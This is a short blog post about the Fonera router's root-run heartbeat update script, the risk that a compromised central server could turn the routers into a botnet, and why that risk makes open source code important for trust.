Cheesy Musings

The Fonera router (or the Linksys for that matter) is basically a computer. It is running a proper Linux operating system, it is always running, and it is connected to a high bandwidth connection. All the Fon routers connect to Fon central on a regular basis (the heartbeat connection) to see if there are any updates or changes for it to install. This works by downloading then running a script as root. If the Fon central server was compromised for more than an hour it would probably be possible to tell every Fon router in the world to connect somewhere else for the heartbeat information. This would be bad. The central server could then be fixed but it would be too late. The entire network would be under someone else’s control. It would be an enormous, and very well connected botnet. I don’t want to do this, and I don’t want anyone else to be able to do this, so it is important that the source code is open so that everyone connecting a Fonera to their network can see how secure it is. I am mildly disappointed that there is a binary only Atheros module in there, however I don’t think this is critical for the security of the device, or indeed the network as a whole.

Open Source does matter, and it is inherently more trustable than closed source because you can verify it yourself, and so can lots and lots of other people. The current distribution method for the source is a large .tar.gz file, with this series of posts I am trying to make the critical bits of the source code more open and accessible to more people, this makes it more trustable, and potentially more secure (if issues are found and fixed).